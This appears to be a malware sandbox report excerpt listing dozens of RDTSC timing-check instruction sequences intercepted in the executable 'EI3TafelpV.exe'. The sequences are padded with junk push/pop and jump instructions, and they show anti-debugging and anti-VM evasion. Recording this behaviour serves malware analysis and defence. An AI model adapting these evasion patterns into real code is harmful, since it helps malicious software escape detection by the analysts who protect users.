                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FDEB39 second address: FDEB3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FDEB3E second address: FDEB53 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F022C80053Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 jno 00007F022C800536h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FDEB53 second address: FDEB57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FDEB57 second address: FDEB67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FDEB67 second address: FDEB6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FDEB6B second address: FDEB71 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FDEB71 second address: FDEB77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FDEB77 second address: FDEB7D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FE29D8 second address: FE29F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 jmp 00007F022CCCFB10h 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FE29F2 second address: FE2A06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F022C800540h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FE2CC3 second address: FE2CE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F022CCCFB13h 0x00000009 popad 0x0000000a push ebx 0x0000000b js 00007F022CCCFB06h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FE90BC second address: FE90CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F022C80053Eh 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FE90CF second address: FE90DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F022CCCFB06h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FE9389 second address: FE938F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FE938F second address: FE93AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jnl 00007F022CCCFB06h 0x0000000c jmp 00007F022CCCFB11h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FE93AE second address: FE93B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FE9684 second address: FE96BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 jmp 00007F022CCCFB0Dh 0x0000000b jmp 00007F022CCCFB13h 0x00000010 push eax 0x00000011 pop eax 0x00000012 popad 0x00000013 pushad 0x00000014 push edi 0x00000015 push edi 0x00000016 pop edi 0x00000017 pop edi 0x00000018 jl 00007F022CCCFB0Eh 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FE9C7D second address: FE9C81 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FE9C81 second address: FE9C87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FE9F8B second address: FE9F91 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FEA22B second address: FEA23E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007F022CCCFB0Dh 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FEA23E second address: FEA26C instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F022C800536h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jno 00007F022C80053Ah 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jnl 00007F022C80053Ch 0x0000001c jl 00007F022C800538h 0x00000022 pushad 0x00000023 popad 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FEA26C second address: FEA271 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FEA271 second address: FEA277 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FEBBAD second address: FEBBB8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007F022CCCFB06h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FEE008 second address: FEE00C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FF1466 second address: FF1473 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jo 00007F022CCCFB06h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FF175B second address: FF175F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FF175F second address: FF1769 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FF1AAF second address: FF1AC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F022C80053Bh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jg 00007F022C800536h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FF1AC7 second address: FF1ADB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F022CCCFB10h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FF6543 second address: FF6547 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FF6547 second address: FF654B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FF7AB6 second address: FF7ACF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F022C80053Bh 0x0000000d jng 00007F022C800536h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FFD53F second address: FFD58F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 jmp 00007F022CCCFB16h 0x0000000b pop esi 0x0000000c jmp 00007F022CCCFB14h 0x00000011 popad 0x00000012 push ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 js 00007F022CCCFB06h 0x0000001b jmp 00007F022CCCFB15h 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FFD58F second address: FFD5A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F022C800542h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FFDA32 second address: FFDA36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FFDA36 second address: FFDA40 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F022C800536h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FFDA40 second address: FFDA58 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007F022CCCFB06h 0x00000009 push eax 0x0000000a pop eax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 pushad 0x00000012 popad 0x00000013 pop esi 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FFDA58 second address: FFDA5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FFDA5E second address: FFDA62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FFDA62 second address: FFDA68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FFDA68 second address: FFDA82 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F022CCCFB16h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FFDBEC second address: FFDC0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F022C800547h 0x00000009 popad 0x0000000a pop ebx 0x0000000b pushad 0x0000000c push eax 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FFDEEA second address: FFDF0C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F022CCCFB18h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FFDF0C second address: FFDF10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FFE07E second address: FFE084 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FFE3BC second address: FFE3E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F022C80053Dh 0x00000007 push esi 0x00000008 jmp 00007F022C800545h 0x0000000d pop esi 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FFE3E9 second address: FFE3FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F022CCCFB06h 0x0000000a jmp 00007F022CCCFB0Bh 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FFE3FF second address: FFE409 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F022C800536h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FFE582 second address: FFE586 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FFE586 second address: FFE5AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jo 00007F022C80054Dh 0x0000000e jmp 00007F022C800547h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FFD0B1 second address: FFD0B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FFD0B7 second address: FFD0D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F022C80053Bh 0x00000009 popad 0x0000000a jns 00007F022C80053Eh 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FFD0D9 second address: FFD0F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F022CCCFB17h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 1006307 second address: 1006319 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F022C80053Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 1006319 second address: 100632D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F022CCCFB12h 0x0000000c jo 00007F022CCCFB06h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 10116AC second address: 10116C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c jmp 00007F022C80053Dh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 10116C5 second address: 10116C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F3D386 second address: F3D3B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F022C800540h 0x00000007 je 00007F022C800536h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007F022C800540h 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 10112EC second address: 10112F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 10112F4 second address: 10112FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 10140AF second address: 10140C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 jmp 00007F022CCCFB0Ch 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 10140C2 second address: 10140C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 10140C8 second address: 10140CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 10140CC second address: 10140D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 1013B6F second address: 1013B75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 101D710 second address: 101D724 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F022C800540h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 10260B1 second address: 10260B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 10291C4 second address: 10291CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 10291CA second address: 10291E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F022CCCFB14h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 1030DD5 second address: 1030E0C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F022C800547h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a jmp 00007F022C800548h 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 102F8B7 second address: 102F8BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 102F9FF second address: 102FA0D instructions: 0x00000000 rdtsc 0x00000002 je 00007F022C800536h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 102FA0D second address: 102FA41 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F022CCCFB06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F022CCCFB15h 0x00000014 jmp 00007F022CCCFB10h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 102FA41 second address: 102FA45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 102FA45 second address: 102FA4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 102FA4B second address: 102FA6A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F022C80053Ch 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jns 00007F022C800536h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 push ecx 0x00000014 push esi 0x00000015 pop esi 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 102FD21 second address: 102FD2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F022CCCFB06h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 102FD2D second address: 102FD45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F022C800540h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 102FD45 second address: 102FD4F instructions: 0x00000000 rdtsc 0x00000002 jne 00007F022CCCFB0Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 1030010 second address: 1030016 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 1030016 second address: 103003D instructions: 0x00000000 rdtsc 0x00000002 jne 00007F022CCCFB06h 0x00000008 jmp 00007F022CCCFB16h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push edx 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 pop edx 0x00000013 push edi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 103003D second address: 1030043 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 1033864 second address: 1033871 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jne 00007F022CCCFB06h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 1033871 second address: 103387E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F022C800536h 0x0000000a push edx 0x0000000b pop edx 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 103387E second address: 1033884 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 1033884 second address: 103388A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 103388A second address: 103388E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 10333D1 second address: 1033400 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F022C800541h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c jmp 00007F022C800546h 0x00000011 pop eax 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 1037E8F second address: 1037E93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 1042C6D second address: 1042C74 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 1042C74 second address: 1042C94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 jmp 00007F022CCCFB15h 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 1044F08 second address: 1044F46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F022C80053Dh 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push edi 0x0000000d pop edi 0x0000000e push edi 0x0000000f pop edi 0x00000010 popad 0x00000011 popad 0x00000012 je 00007F022C800573h 0x00000018 pushad 0x00000019 push eax 0x0000001a pop eax 0x0000001b jmp 00007F022C800549h 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 1044F46 second address: 1044F4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 10471C9 second address: 10471CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 10471CD second address: 10471D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 10471D3 second address: 10471E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 ja 00007F022C800536h 0x0000000e rdtsc
